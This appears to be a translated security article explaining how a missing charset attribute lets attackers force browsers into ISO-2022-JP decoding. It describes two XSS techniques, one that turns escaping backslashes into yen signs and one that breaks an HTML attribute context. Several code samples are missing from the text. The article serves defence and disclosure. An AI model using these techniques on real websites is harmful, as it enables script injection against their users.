The charset attribute and the importance of using it

What assumptions can be made about the next HTTP response from the server?

Looking at this small fragment of the HTTP response, one can assume that the web application probably contains a vulnerability. XSS.

Why is this possible? What stands out in this server response?

You'd be right to be skeptical about the Content-Type header. It has a minor flaw – absence charset attribute. This may seem unimportant, but in this article we will explain how attackers can exploit this flaw to inject arbitrary JavaScript code into a website, deliberately changing the character setwhich the browser expects.

Character encoding

A typical Content-Type header in an HTTP response looks like this:

The charset attribute tells the browser that UTF-8 was used to encode the HTTP response body. A character encoding such as UTF-8 determines correspondence between characters and bytesWhen a web server processes an HTML document, it maps the characters in the document to the corresponding bytes and passes them along in the body of the HTTP response. This process converts (encodes) characters into bytes:

When the browser receives these bytes in the body of an HTTP response, it can convert them back (decode) into the characters of the HTML document:

UTF-8 is one of many ways of coding character set that modern browsers are required to support according to the HTML specification. There are also many other algorithms, such as UTF-16, ISO-8859-xx, windows-125x, GBK, Big5, etc. Knowing what encoding the server used is critical for the browser, because without it, it will not be able to decode correctly bytes in the HTTP response body.

But what happens if the charset attribute is not specified in the Content-Type header or is specified incorrectly?

In this case, the browser will look for the tag in the HTML document itself. This tag may also contain a charset attribute, which specifies the character encoding (). This is the rule for the browser: to read an HTML document, it must first decode the HTTP response body. So the browser must first make a guess about some way of encoding the HTTP response body, then decode it, find the tag, and possibly re-decode the bytes with the specified character encoding.

Another, less common approach to specifying character encoding is to specify byte order. Byte Order Mark (BOM). This is a special Unicode character (U+FEFF) that can be placed before a string to indicate byte order and character encoding. It is primarily used in files, but since these files may be served via a web server, modern browsers support this method. A byte order mark at the beginning of an HTML document even takes precedence over the charset attribute in the Content-Type header and the tag.

To summarize, there are three common ways that a browser uses to determine the character encoding of an HTML document, ordered by priority:

  1. Byte order mark at the beginning of the HTML document,

  2. charset attribute in the Content-Type header,

  3. tag in an HTML document.

No encoding information

The byte order mark is usually very rarely used, and the charset attribute is not always present in the Content-Type header or may be specified incorrectly. Also, especially for partial HTML responses from the server, the tag indicating the character encoding is usually missing. In these cases, the browser has no information about which character set to use:

Have you ever seen an error message like this? Probably not, because it doesn't exist.

As with invalid HTML syntax, browsers attempt to reconstruct the missing character set information when parsing the content received from the web server, and from this extract the maximum possible. This relaxed behavior contributes to a good user experience, but can also open up opportunities for the use of such exploitation techniqueslike mXSS.

In the absence of character encoding information, browsers try to make a guess based on the content, which is called autodetection (auto-detection). This is similar to searching by MIME type (MIME type sniffing), but operates at the character encoding level. For example, the Chromium Blink rendering engine uses the library Compact Encoding Detection (CED) for automatic character encoding detection. As we will see later, from an attacker's perspective, the automatic character encoding detection function is a very powerful tool.

At this point, we've become familiar with the various mechanisms that browsers use to determine the character encoding of HTML documents. But how can attackers exploit this?

Differences in encodings

The purpose of character encoding is to convert characters into a sequence of bytes that the computer can process. These bytes are transmitted over the network and decoded back into characters by the receiver. This restores the same characters that the sender intended to transmit:

This only works well if the sender and receiver have agreed on how the characters are to be encoded. If there is discrepancy between the character encoding used for encoding and decoding, the recipient may see different characters:

This mismatch between the character encoding used for encoding and decoding is what we call differences in encodings in this article.

For web applications, it is vital that user-controlled data is sanitized to prevent vulnerabilities. Cross-Site Scripting (XSS)If the character encoding used by the browser is different from the one used by the web server, this could theoretically break data sanitization and lead to XSS vulnerabilities.

This in itself is not big news, and even Google faced a similar problem back in In 2005. Google's 404 page did not provide character encoding information, which could be exploited by adding an XSS payload in the encoding UTF-7In UTF-7, special HTML characters such as angle brackets are encoded differently than in ASCII, which can be used to bypass sanitization:

This clearly demonstrates the dangers of this encoding, which was deprecated in later years to prevent similar security problems. The HTML specification currently explicitly prohibits the use of UTF-7 to prevent XSS vulnerabilities.

There are many other supported character encodings, most of which are actually useless from an attacker's point of view. All special html characterssuch as angle brackets and quotation marks, are used only in ASCII format, and since most character encodings are compatible with ASCIIthen for these characters there is no difference in the encoding used. Even for UTF-16, which is not compatible with ASCII due to the use of two bytes per character, it is usually impossible to exploit ASCII characters, since their corresponding byte representation is the same, only with a null byte at the end (little-endian) or at the beginning (big-endian).

However, there is a particularly interesting encoding: ISO-2022-JP.

ISO-2022-JP

ISO-2022-JP is a Japanese character encoding defined in RFC 1468. It is one of the official character encodings that user agents (browsers) must support, according to the definition HTML standard. What is especially interesting about this encoding is that it supports certain escape sequences For switching between different character sets.

For example, if a byte sequence contains bytes 0x1b, 0x28, 0x42then these bytes are not decoded into a character, but instead indicate that all following bytes should be decoded using the ASCII encoding. There are a total of four different escape sequences that can be used to switch between character sets: ASCII, JIS X 0201 1976, JIS X 0208 1978, and JIS X 0208 1983.

iso-2022-jp

iso-2022-jp

This feature of ISO-2022-JP not only provides greater flexibility, but may also violate fundamental assumptions. At the time of writing, Chrome (Blink) and Firefox (Gecko) automatically detected this encoding. The appearance of one of these escape sequences is usually enough for the automatic encoding detection algorithm to consider the HTTP response text to be encoded according to the ISO-2022-JP standard.

The following sections describe two different exploitation techniques that attackers can use when they manage to force a browser to use ISO-2022-JP encoding. Depending on the capabilities of the attacker, this can be achieved, for example, by directly manipulating the charset attribute in the Content-Type header or by inserting a tag using a vulnerability HTML injectionIf the web server provides an invalid charset attribute or does not provide it at all, then usually no additional provisions are required, since attackers can easily switch the encoding to ISO-2022-JP using automatic encoding detection.

Method 1: Eliminate Backslash Escaping

This method consists of the fact that user controlled data are placed in JavaScript string:

Let's imagine there is a website that accepts two query parameters, search And lang. The first parameter is displayed in a normal text context, and the second parameter (lang) is inserted into the JavaScript string:

Special HTML characters in parameter search are encoded in HTML, and the parameter lang is processed by escaping double quotes (“) and backslashes (). This will prevent the string context from being broken and JavaScript code from being injected:

The default mode for the ISO-2022-JP standard is ASCII. This means that all bytes received in the HTTP response body are decoded into ASCII and the resulting HTML document looks like we expect:

Now let's imagine that an attacker injects into the parameter search escape sequence to switch to JIS X 0201 1976 character encoding mode (0x1b, 0x28, 0x4a):

As we can see, the result contains all the same characters as before, since the encoding is JIS X 0201 1976 mostly compatible with ASCII. However, if we study its code table carefully, we will notice that there are two exceptions (highlighted in yellow):

Byte 0x5c is converted to the yen symbol (¥), and the byte 0x7e – into the overline character (‾). This is different from ASCII, where 0x5c matches the backslash character (\), and 0x7e – with the tilde symbol (~).

This means that when the web server tries to escape a double quote in a parameter lang by using a backslash, the browser no longer sees the backslash, but instead sees the yen sign:

Accordingly, the added double quote effectively marks the end of the string and allows an attacker to inject arbitrary JavaScript code:

While this method is quite effective, it is limited to bypassing sanitization only in the context of JavaScript, since the backslash character has no special purpose within HTML. The next section explains a more advanced method that can be used in the context of HTML.

Method 2: Violating HTML Context

The use case for the second method is that an attacker can manipulate the values in two different HTML contexts. The most common use case would be a markup-aware website markdown. For example, consider the following markdown text:

![blue](0.png) or ![red](1.png)

The resulting HTML code looks like this:

<img src="https://habr.com/ru/articles/835206/0.png" alt="blue"/> or <img src="1.png" alt="red"/>

The important thing here is that an attacker can manipulate values ​​in two different HTML contexts. In this case, these are:

  • Attribute context (image description/source)

  • Normal text context (text surrounding images)

By default, ISO-2022-JP uses ASCII encoding mode and the browser sees the HTML document as expected:

Now suppose the attacker inserts an escape sequence to switch the encoding to JIS X 0208 1978 in the description of the first image:

This forces the browser to decode all subsequent bytes using the JIS X 0208 1978 encoding. This encoding uses a fixed amount of two bytes per character and is not compatible with ASCII encoding. This effectively destroys the structure of the HTML document:

However, a second escape sequence can be added to the text context between both images to switch the encoding back to ASCII:

So all the following bytes are decoded again using ASCII:

However, when we examine the HTML code, we can see that something has changed. The beginning of the second tag img is now part of the attribute value alt:

The reason for this is that the 4 bytes between the two escape sequences were decoded using JIS X 0208 1978, thus absorbing the closing double quotes attribute values:

At this point the attribute value src The second image is essentially no longer the value of the attribute. So an attacker can replace this value with a JavaScript error handler:

Conclusion

In this article, we emphasized the importance of providing character encoding information when working with HTML documents. The lack of such information can lead to serious XSS vulnerabilities, when attackers can change the character set processed by the browser.

We've detailed how the browser determines the character set used to decode the HTTP response body, and explained two different methods attackers can use to inject arbitrary JavaScript code into a website using the ISO-2022-JP character encoding.

While we believe that not specifying the character encoding is a real vulnerability, the browser's automatic character encoding detection greatly increases its impact. Therefore, we hope that browsers will disable the automatic encoding detection mechanism in accordance with our proposal – at least for the ISO-2022-JP character encoding.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *